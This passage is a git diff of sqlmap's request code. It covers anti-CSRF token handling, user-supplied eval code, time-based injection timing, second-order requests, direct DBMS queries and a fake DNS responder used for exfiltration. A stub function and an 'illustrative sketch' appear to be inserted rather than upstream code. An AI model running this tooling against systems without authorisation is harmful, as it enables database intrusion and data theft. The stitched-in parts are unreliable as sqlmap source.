conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282 + kb.choices.cookieEncode = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True) + if not kb.choices.cookieEncode: + skip = True + + if not skip: + if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path) + value = urlencode(value, spaceplus=kb.postSpaceToPlus) + payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus) + value = agent.replacePayload(value, payload) + postUrlEncode = False if conf.hpp: - if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)): + if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_PLATFORM.ASP, WEB_PLATFORM.ASPX)): warnMsg = "HTTP parameter pollution should work only against " warnMsg += "ASP(.NET) targets" singleTimeWarnMessage(warnMsg) if place in (PLACE.GET, PLACE.POST): _ = re.escape(PAYLOAD_DELIMITER) - match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) + match = re.search(r"(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value) if match: payload = match.group("value") @@ -658,17 +1178,19 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent if place: value = agent.removePayloadDelimiters(value) - if conf.checkPayload: - checkPayload(value) - if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value + elif place == PLACE.GET: # Note: for (e.g.) 
checkWaf() when there are no GET parameters + get = value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value + elif place == PLACE.POST: + post = value if PLACE.CUSTOM_POST in conf.parameters: - post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value + post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value + post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value @@ -688,161 +1210,446 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent uri = conf.url if value and place == PLACE.CUSTOM_HEADER: - if not auxHeaders: - auxHeaders = {} - auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] + if value.split(',')[0].capitalize() == PLACE.COOKIE: + cookie = value.split(',', 1)[-1] + else: + auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1] + + if conf.csrfToken: + token = AttribDict() + + def _adjustParameter(paramString, parameter, newValue): + retVal = paramString + + if urlencode(parameter) in paramString: + parameter = urlencode(parameter) + + match = re.search(r"%s=[^&]*" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString) + else: + match = re.search(r"(%s[\"']\s*:\s*[\"'])([^\"']*)" % re.escape(parameter), paramString, re.I) + if match: + retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString) + + return retVal + + for attempt in xrange(conf.csrfRetries + 1): + if token: + break + + if attempt > 0: + warnMsg = "unable to find anti-CSRF token '%s' at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + warnMsg += ". sqlmap is going to retry the request" + logger.warning(warnMsg) + + page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, post=conf.csrfData or (conf.data if conf.csrfUrl == conf.url and (conf.csrfMethod or "").upper() == HTTPMETHOD.POST else None), method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) + page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 
'foo:bar=...') + + match = re.search(r"(?i)<input[^>]+\bname=[\"']?(?P<name>%s)\b[^>]*\bvalue=[\"']?(?P<value>[^>'\"]*)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?i)<input[^>]+\bvalue=[\"']?(?P<value>[^>'\"]*)[\"']?[^>]*\bname=[\"']?(?P<name>%s)\b" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"(?P<name>%s)[\"']:[\"'](?P<value>[^\"']+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*[:=]\s*(?P<value>\w+)" % conf.csrfToken, getUnicode(headers), re.I) + + if not match: + match = re.search(r"\b(?P<name>%s)\s*=\s*['\"]?(?P<value>[^;'\"]+)" % conf.csrfToken, page or "", re.I) + + if not match: + match = re.search(r"<meta\s+name=[\"']?(?P<name>%s)[\"']?[^>]+\b(value|content)=[\"']?(?P<value>[^>\"']+)" % conf.csrfToken, page or "", re.I) + + if match: + token.name, token.value = match.group("name"), match.group("value") + + match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token.value) + if match: + token.value = "".join(_unichr(int(_)) for _ in match.group(1).replace(' ', "").split(',')) + + if not token: + if conf.csrfUrl and conf.csrfToken and conf.csrfUrl != conf.url and code == _http_client.OK: + if headers and PLAIN_TEXT_CONTENT_TYPE in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): + token.name = conf.csrfToken + token.value = page + + if not token and conf.cj and any(re.search(conf.csrfToken, _.name, re.I) for _ in conf.cj): + for _ in conf.cj: + if re.search(conf.csrfToken, _.name, re.I): + token.name, token.value = _.name, _.value + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): + if post: + post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + elif get: + get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, token.name, token.value) + else: + get = "%s=%s" % (token.name, token.value) + break + + if not token: + errMsg = "anti-CSRF token '%s' can't be found at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url) + if not conf.csrfUrl: + errMsg += ". 
You can try to rerun by providing " + errMsg += "a valid value for option '--csrf-url'" + raise SqlmapTokenException(errMsg) + + if token: + token.value = token.value.strip("'\"") + + for candidate in (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST, PLACE.URI): + if candidate in conf.parameters: + if candidate == PLACE.URI and uri: + uri = _adjustParameter(uri, token.name, token.value) + elif candidate == PLACE.GET and get: + get = _adjustParameter(get, token.name, token.value) + elif candidate in (PLACE.POST, PLACE.CUSTOM_POST) and post: + post = _adjustParameter(post, token.name, token.value) + + for i in xrange(len(conf.httpHeaders)): + if conf.httpHeaders[i][0].lower() == token.name.lower(): + conf.httpHeaders[i] = (conf.httpHeaders[i][0], token.value) if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString - match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) + match = re.search(r"(\A|\b)%s=(?P<value>[^&;]*)" % re.escape(randomParameter), paramString) if match: origValue = match.group("value") - retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = re.sub(r"(\A|\b)%s=[^&;]*" % re.escape(randomParameter), "%s=%s" % (randomParameter, newValue), paramString) + else: + match = re.search(r"(\A|\b)(%s\b[^\w]+)(?P<value>\w+)" % re.escape(randomParameter), paramString) + if match: + origValue = match.group("value") + newValue = randomizeParameterValue(origValue) if randomParameter not in kb.randomPool else random.sample(kb.randomPool[randomParameter], 1)[0] + retVal = paramString.replace(match.group(0), "%s%s" % (match.group(2), newValue)) return retVal for randomParameter in conf.rParam: - for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): + for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) - elif item == PLACE.POST and post: + elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) + elif item == PLACE.URI and uri: + uri = _randomizeParameter(uri, randomParameter) if conf.evalCode: - delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER - variables = {} + delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER + variables = {"uri": uri, "lastPage": threadData.lastPage, "_locals": locals(), "cookie": cookie} originals = {} - for item in filter(None, (get, post)): + if not get and PLACE.URI in conf.parameters: + query = _urllib.parse.urlsplit(uri).query or "" + else: + query = None + + for item in filterNone((get, post if not kb.postHint else None, query)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) - evaluateCode("%s=%s" % (name, repr(value)), variables) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True, spaceplus=(item == post and kb.postSpaceToPlus)) + variables[name] = value + + if post and kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + for name, value in (parseJson(post) or {}).items(): + if safeVariableNaming(name) != 
name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + variables[name] = value + + if cookie: + for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): + if '=' in part: + name, value = part.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + conf.evalCode = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), conf.evalCode) + name = safeVariableNaming(name) + value = urldecode(value, convall=True) + variables[name] = value + + while True: + try: + compile(getBytes(re.sub(r"\s*;\s*", "\n", conf.evalCode)), "", "exec") + except SyntaxError as ex: + if ex.text: + original = replacement = getUnicode(ex.text.strip()) + + if '=' in original: + name, value = original.split('=', 1) + name = name.strip() + if safeVariableNaming(name) != name: + replacement = re.sub(r"\b%s\b" % re.escape(name), safeVariableNaming(name), replacement) + else: + for _ in re.findall(r"[A-Za-z_]+", original)[::-1]: + if safeVariableNaming(_) != _: + replacement = replacement.replace(_, safeVariableNaming(_)) + break + + if original == replacement: + conf.evalCode = conf.evalCode.replace(EVALCODE_ENCODED_PREFIX, "") + break + else: + conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement) + else: + break + else: + break originals.update(variables) evaluateCode(conf.evalCode, variables) - for name, value in variables.items(): - if name != "__builtins__" and originals.get(name, "") != value: - if isinstance(value, (basestring, int)): - value = unicode(value) - if '%s=' % name in (get or ""): - get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) - elif '%s=' % name in (post or ""): - post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) - elif post is not None: - post += "%s%s=%s" % (delimiter, name, value) - else: - get += "%s%s=%s" % (delimiter, name, value) - - if not skipUrlEncode: + for variable in list(variables.keys()): + if unsafeVariableNaming(variable) != variable: + entry = variables[variable] + del variables[variable] + variables[unsafeVariableNaming(variable)] = entry + + uri = variables["uri"] + cookie = variables["cookie"] + + for name, entry in variables.items(): + if name != "__builtins__" and originals.get(name, "") != entry: + if isinstance(entry, (int, float, six.string_types, six.binary_type)): + found = False + entry = getUnicode(entry, UNICODE_ENCODING) + + if kb.postHint == POST_HINT.MULTIPART: + boundary = "--%s" % re.search(r"boundary=([^\s]+)", contentType).group(1) + if boundary: + parts = post.split(boundary) + match = re.search(r'\bname="%s"' % re.escape(name), post) + if not match and parts: + parts.insert(2, parts[1]) + parts[2] = re.sub(r'\bname="[^"]+".*', 'name="%s"' % re.escape(name), parts[2]) + for i in xrange(len(parts)): + part = parts[i] + if re.search(r'\bname="%s"' % re.escape(name), part): + match = re.search(r"(?s)\A.+?\r?\n\r?\n", part) + if match: + found = True + first = match.group(0) + second = part[len(first):] + second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(entry), second) + parts[i] = "%s%s" % (first, second) + post = boundary.join(parts) + + elif kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""): + if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP): + if re.search(r"<%s\b" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), 
r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + elif re.search(r"\b%s>" % re.escape(name), post): + found = True + post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]%s['\"]:" % re.escape(name), post) + if match: + quote = match.group(0)[0] + post = post.replace("\\%s" % quote, BOUNDARY_BACKSLASH_MARKER) + match = re.search(r"(%s%s%s:\s*)(\d+|%s[^%s]*%s)" % (quote, re.escape(name), quote, quote, quote, quote), post) + if match: + found = True + post = post.replace(match.group(0), "%s%s" % (match.group(1), entry if entry.isdigit() else "%s%s%s" % (match.group(0)[0], entry, match.group(0)[0]))) + post = post.replace(BOUNDARY_BACKSLASH_MARKER, "\\%s" % quote) + + regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>\g<2>%s" % entry.replace('\\', r'\\'), post) + + regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) + if not found and re.search(regex, (post or "")): + found = True + post = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post) + + if re.search(regex, (get or "")): + found = True + get = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), get) + + if re.search(regex, (query or "")): + found = True + uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), uri) + + regex = r"((\A|%s\s*)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) + if re.search(regex, (cookie or "")): + found = True + cookie = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), cookie) + + if not found: + if post is not None: + if kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE): + match = re.search(r"['\"]", post) + if match: + quote = match.group(0) + post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, entry if entry.isdigit() else "%s%s%s" % (quote, entry, quote))), post) + else: + post += "%s%s=%s" % (delimiter, name, entry) + elif get is not None: + get += "%s%s=%s" % (delimiter, name, entry) + elif cookie is not None: + cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, entry) + + if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) - elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys(): + elif postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) - if timeBasedCompare: - if len(kb.responseTimes) < MIN_TIME_RESPONSES: + if timeBasedCompare and not conf.disableStats: + if len(kb.responseTimes.get(kb.responseTimeMode, [])) < MIN_TIME_RESPONSES: clearConsoleLine() + kb.responseTimes.setdefault(kb.responseTimeMode, []) + if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " - warnMsg += "time-based injections because of its high latency time" + warnMsg += "time-based injections because of inherent high latency time" singleTimeWarnMessage(warnMsg) - warnMsg = "time-based comparison needs larger statistical " - warnMsg += "model. Making a few dummy requests, please wait.." 
+ warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "") + warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of") + dataToStdout(warnMsg) + + while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES: + _ = kb.responseTimePayload.replace(RANDOM_INTEGER_MARKER, str(randomInt(6))).replace(RANDOM_STRING_MARKER, randomStr()) if kb.responseTimePayload else kb.responseTimePayload + Connect.queryPage(value=_, content=True, raise404=False) + dataToStdout('.') + + dataToStdout(" (done)\n") + + elif not kb.testMode: + warnMsg = "it is very important to not stress the network connection " + warnMsg += "during usage of time-based payloads to prevent potential " + warnMsg += "disruptions " singleTimeWarnMessage(warnMsg) - while len(kb.responseTimes) < MIN_TIME_RESPONSES: - Connect.queryPage(content=True) + if not kb.laggingChecked: + kb.laggingChecked = True - deviation = stdev(kb.responseTimes) + deviation = stdev(kb.responseTimes[kb.responseTimeMode]) - if deviation > WARN_TIME_STDEV: + if deviation is not None and deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE - warnMsg = "there is considerable lagging " + warnMsg = "considerable lagging has been detected " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " - warnMsg += "%d or more)" % (conf.timeSec * 2) + warnMsg += "10 or more)" logger.critical(warnMsg) - elif not kb.testMode: - warnMsg = "it is very important not to stress the network adapter's " - warnMsg += "bandwidth during usage of time-based queries" - singleTimeWarnMessage(warnMsg) - - if conf.safUrl and conf.saFreq > 0: + if (conf.safeFreq or 0) > 0: kb.queryCounter += 1 - if kb.queryCounter % conf.saFreq == 0: - Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) + if kb.queryCounter % conf.safeFreq == 0: + if conf.safeUrl: + Connect.getPage(url=conf.safeUrl, post=conf.safePost, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) + elif kb.safeReq: + Connect.getPage(url=kb.safeReq.url, post=kb.safeReq.post, method=kb.safeReq.method, auxHeaders=kb.safeReq.headers) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False - if kb.nullConnection == NULLCONNECTION.HEAD: - method = HTTPMETHOD.HEAD - elif kb.nullConnection == NULLCONNECTION.RANGE: - if not auxHeaders: - auxHeaders = {} + try: + pushValue(kb.pageCompress) + kb.pageCompress = False - auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" + if kb.nullConnection == NULLCONNECTION.HEAD: + method = HTTPMETHOD.HEAD + elif kb.nullConnection == NULLCONNECTION.RANGE: + auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" - _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) + _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) - if headers: - if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: - pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in 
headers: - pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) + if headers: + try: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): + pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0]) + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): + pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + except ValueError: + pass + finally: + kb.pageCompress = popValue() - if not pageLength: + if pageLength is None: try: - page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) + page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " - warnMsg += "behavior in custom WAF/IDS/IPS solutions" + warnMsg += "behavior in custom WAF/IPS solutions" singleTimeWarnMessage(warnMsg) - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + if not ignoreSecondOrder: + if conf.secondUrl: + page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif kb.secondReq and IPS_WAF_CHECK_PAYLOAD not in _urllib.parse.unquote(value or ""): + def _(value): + if kb.customInjectionMark in (value or ""): + if payload is None: + value = value.replace(kb.customInjectionMark, "") + else: + try: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value) + except re.error: + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), re.escape(payload), value) + return value + page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) - kb.originalCode = kb.originalCode or code + kb.originalCode = code if kb.originalCode is None else kb.originalCode + kb.originalPage = page if kb.originalPage is None else kb.originalPage if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: - return wasLastRequestDelayed() + return wasLastResponseDelayed() elif noteResponseTime: - kb.responseTimes.append(threadData.lastQueryDuration) + kb.responseTimes.setdefault(kb.responseTimeMode, []) + kb.responseTimes[kb.responseTimeMode].append(threadData.lastQueryDuration) + if len(kb.responseTimes[kb.responseTimeMode]) > MAX_TIME_RESPONSES: + kb.responseTimes[kb.responseTimeMode] = kb.responseTimes[kb.responseTimeMode][-MAX_TIME_RESPONSES // 2:] if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = 
re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None - kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None + + message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I) + if message: + kb.permissionFlag = True + singleTimeWarnMessage("potential permission problems detected ('%s')" % message) + + headers = patchHeaders(headers) if content or response: - return page, headers + return page, headers, code if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) - elif pageLength or page: - return comparison(page, headers, code, getRatioValue, pageLength) else: - return False + return comparison(page, headers, code, getRatioValue, pageLength) + +def setHTTPHandlers(): # Cross-referenced function + raise NotImplementedError diff --git a/lib/request/direct.py b/lib/request/direct.py index 6014fd12de1..171f37151d6 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -1,22 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re import time -from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import extractExpectedValue from lib.core.common import getCurrentThreadData -from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import isListLike +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -24,7 +24,9 @@ from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import TIMEOUT_STATE from lib.core.settings import UNICODE_ENCODING +from lib.utils.safe2bin import safecharencode from lib.utils.timeout import timeout def direct(query, content=True): @@ -33,7 +35,7 @@ def direct(query, content=True): query = agent.adjustLateValues(query) threadData = getCurrentThreadData() - if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query: + if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): @@ -42,22 +44,34 @@ def direct(query, content=True): select = False break - if select and not query.upper().startswith("SELECT "): - query = "SELECT %s" % query + if select: + if re.search(r"(?i)\ASELECT ", query) is None: + query = "SELECT %s" % query + + if conf.binaryFields: + for field in conf.binaryFields: + field = field.strip() + if re.search(r"\b%s\b" % re.escape(field), query): + query = re.sub(r"\b%s\b" % re.escape(field), agent.hexConvertField(field), query) logger.log(CUSTOM_LOGGING.PAYLOAD, query) output = hashDBRetrieve(query, True, True) start = time.time() - if not select and "EXEC " not in query: - _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) - elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): - output = timeout(func=conf.dbmsConnector.select, args=(query,), 
duration=conf.timeout, default=None) - hashDBWrite(query, output, True) + if not select and re.search(r"(?i)\bEXEC ", query) is None: + timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) + elif not (output and ("%soutput" % conf.tablePrefix) not in query and ("%sfile" % conf.tablePrefix) not in query): + output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) + if state == TIMEOUT_STATE.NORMAL: + hashDBWrite(query, output, True) + elif state == TIMEOUT_STATE.TIMEOUT: + conf.dbmsConnector.close() + conf.dbmsConnector.connect() elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) + threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: diff --git a/lib/request/dns.py b/lib/request/dns.py index 85d111c06e4..1be54888274 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -1,70 +1,110 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + +import binascii import os import re import socket +import struct import threading import time class DNSQuery(object): """ - Used for making fake DNS resolution responses based on received - raw request - - Reference(s): - http://code.activestate.com/recipes/491264-mini-fake-dns-server/ - https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py + >>> DNSQuery(b'|K\\x01 \\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x03www\\x06google\\x03com\\x00\\x00\\x01\\x00\\x01\\x00\\x00)\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\n\\x00\\x08O4|Np!\\x1d\\xb3')._query == b"www.google.com." + True + >>> DNSQuery(b'\\x00')._query == b"" + True """ def __init__(self, raw): self._raw = raw - self._query = "" + self._query = b"" - type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits + try: + type_ = (ord(raw[2:3]) >> 3) & 15 # Opcode bits - if type_ == 0: # Standard query - i = 12 - j = ord(raw[i]) + if type_ == 0: # Standard query + i = 12 + j = ord(raw[i:i + 1]) - while j != 0: - self._query += raw[i + 1:i + j + 1] + '.' - i = i + j + 1 - j = ord(raw[i]) + while j != 0: + self._query += raw[i + 1:i + j + 1] + b'.' 
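# --- Illustrative sketch, not part of the patch: the surrounding DNSQuery loop
# --- walks the QNAME portion of a raw DNS query, a run of length-prefixed labels
# --- terminated by a zero byte (offset 12 skips the fixed DNS header). The
# --- standalone helper below is a hypothetical equivalent, not sqlmap code.
def parse_qname(raw, offset=12):
    name, i = b"", offset
    length = raw[i]
    while length != 0:
        # <len> byte followed by that many label bytes, e.g. \x03www\x06google\x03com\x00
        name += raw[i + 1:i + 1 + length] + b"."
        i += length + 1
        length = raw[i]
    return name

# parse_qname(b"\x00" * 12 + b"\x03www\x06google\x03com\x00") == b"www.google.com."
# --- end of sketch ---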
